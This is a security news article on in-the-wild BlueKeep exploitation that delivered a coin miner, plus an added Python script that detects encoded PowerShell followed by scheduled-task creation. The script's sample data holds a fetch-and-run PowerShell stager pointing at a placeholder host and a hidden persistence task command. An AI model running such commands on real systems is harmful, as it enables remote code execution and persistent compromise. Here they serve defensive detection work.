BlueKeep exploits have been spotted in the wild, urging Windows users to patch now.
Security researcher Kevin Beaumont observed that his BlueKeep honeypots were crashing; Marcus Hutchins, and later Microsoft security researchers, confirmed that the crashes were caused by a BlueKeep exploit module being used to deliver a Monero miner.
What is the BlueKeep vulnerability?
The vulnerability was named BlueKeep by computer security expert Kevin Beaumont on Twitter. BlueKeep, tracked as CVE-2019-0708, is a ‘wormable’ pre-authentication remote code execution flaw, which means it has the potential to spread in a worm-like fashion and self-replicate without requiring any user interaction. BlueKeep is a vulnerability in Remote Desktop Services (reached over the Remote Desktop Protocol, RDP) that affects Windows Vista, Windows 7, Windows XP, Server 2003 and Server 2008 operating systems; newer Windows versions are not affected.
The vulnerability has not surfaced in the form of a worm so far. Instead, the attackers scanned the internet for vulnerable systems and attacked each unpatched system one at a time, deploying a BlueKeep exploit and then a cryptocurrency miner.
Microsoft had deployed behavioural detection in Microsoft Defender ATP for the BlueKeep Metasploit module back in early September. Its telemetry then showed the following sequence:
- Early September: behavioural detection for the BlueKeep Metasploit module started firing.
- The analysis showed an increase in Remote Desktop Services (RDP) service crashes from about 10 to about 100 per day.
- On October 9, 2019, a similar increase in memory corruption crashes was noted.
- On October 23, 2019, crashes on external researchers' honeypots started.
“Microsoft security researchers found that an earlier coin mining campaign in September used the main implant that contacted the same command-and-control infrastructure used during the October BlueKeep Metasploit campaign, which in cases where the exploit did not cause the system to crash was also observed installing a coin-miner.” the report stated.
- The attackers start with port scans for machines exposing a vulnerable RDP service to the internet.
- As soon as they find such a machine, they use the BlueKeep Metasploit module to run a PowerShell script.
- That script downloads and launches several other encoded PowerShell scripts.
- Apart from downloading the coin miner, the final script also creates a scheduled task to ensure the miner persists across reboots.
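The attack chain above leaves two host-side signals a defender can correlate: PowerShell launched with an encoded command, followed shortly afterwards on the same host by `schtasks.exe /create`. The following Python script is an added example written for this article (not code from Microsoft or from the campaign) that decodes `-EncodedCommand` payloads and flags that sequence over constructed process-creation records. The record field names, the hypothetical `203.0.113.10` download host and the 15-minute correlation window are all assumptions for the example; the records loosely mirror a Sysmon Event ID 1 export rather than any real telemetry schema.

```python
import base64
import re
from datetime import datetime, timedelta


def encode_command(script: str) -> str:
    """Encode a script the way `powershell -EncodedCommand` expects: UTF-16LE, then base64."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Hypothetical first-stage script; 203.0.113.10 is a documentation (TEST-NET-3) address.
STAGER = "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.10/stage2.ps1')"

# Constructed sample events (assumed field names: time, host, image, cmd). Host hp-01 shows
# the miner chain; ws-07 shows a harmless encoded command with no follow-on persistence.
SAMPLE_EVENTS = [
    {"time": "2019-10-23T10:00:05", "host": "hp-01",
     "image": r"C:\Windows\System32\svchost.exe", "cmd": "svchost.exe -k NetworkService"},
    {"time": "2019-10-23T10:00:07", "host": "hp-01",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmd": "powershell.exe -nop -w hidden -enc " + encode_command(STAGER)},
    {"time": "2019-10-23T10:00:40", "host": "hp-01",
     "image": r"C:\Windows\System32\schtasks.exe",
     "cmd": r'schtasks.exe /create /sc minute /mo 10 /tn "WindowsUpdate" '
            r'/tr "powershell -nop -w hidden -File C:\ProgramData\m.ps1" /f'},
    {"time": "2019-10-23T11:15:00", "host": "ws-07",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmd": "powershell.exe -EncodedCommand " + encode_command("Get-Date")},
]

# PowerShell accepts any unambiguous prefix of -EncodedCommand (-e, -en, -enc, ...) plus -ec.
# Requiring whitespace after the switch keeps -ExecutionPolicy from matching.
ENCODED_FLAG = re.compile(r"(?i)\s-(?:e|ec|en[a-z]*)\s+([A-Za-z0-9+/=]{16,})")


def decode_encoded_command(cmd: str):
    """Return the decoded script if cmd carries an encoded command, else None."""
    m = ENCODED_FLAG.search(cmd)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def is_powershell(ev) -> bool:
    return ev["image"].lower().endswith("\\powershell.exe")


def is_task_creation(ev) -> bool:
    return ev["image"].lower().endswith("\\schtasks.exe") and "/create" in ev["cmd"].lower()


def triage(events, window=timedelta(minutes=15)):
    """Flag encoded PowerShell, and chain it to a scheduled-task creation on the same host within `window`."""
    events = sorted(events, key=lambda e: e["time"])
    encoded, chains = [], []
    for i, ev in enumerate(events):
        if not is_powershell(ev):
            continue
        script = decode_encoded_command(ev["cmd"])
        if script is None:
            continue
        finding = {"host": ev["host"], "time": ev["time"], "decoded": script}
        encoded.append(finding)
        t0 = datetime.fromisoformat(ev["time"])
        for later in events[i + 1:]:
            if later["host"] != ev["host"]:
                continue
            if datetime.fromisoformat(later["time"]) - t0 > window:
                break  # events are time-ordered, so nothing later can be inside the window
            if is_task_creation(later):
                chains.append({**finding, "task_cmd": later["cmd"]})
                break
    return {"encoded": encoded, "chains": chains}


if __name__ == "__main__":
    result = triage(SAMPLE_EVENTS)
    for f in result["encoded"]:
        print(f"[encoded powershell] {f['host']} {f['time']}: {f['decoded']}")
    for c in result["chains"]:
        print(f"[encoded powershell -> schtasks /create] {c['host']}: {c['task_cmd']}")
```

Decoding the payload matters more than the flag itself: encoded commands are common in legitimate administration, so the decoded text (a `DownloadString` stager versus `Get-Date`) and the follow-on persistence step are what separate the miner chain from noise. In a real deployment the records would come from Sysmon, Windows Security Event ID 4688 with command-line auditing, or an EDR export, and the window should be tuned to the environment.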
There is always the possibility that the threat actors behind this attack could deliver far more damaging payloads than a crypto-miner through the same foothold.
Around 700,000 systems remain unpatched. BlueKeep will remain a threat as long as systems stay unpatched, credential hygiene is poor and exploit tooling is available to threat actors. Users are encouraged to identify and update vulnerable systems immediately. Where patching must be delayed, enabling Network Level Authentication (NLA) and blocking TCP port 3389 at the network perimeter are mitigations, because the flaw is triggered before authentication; neither replaces the patch.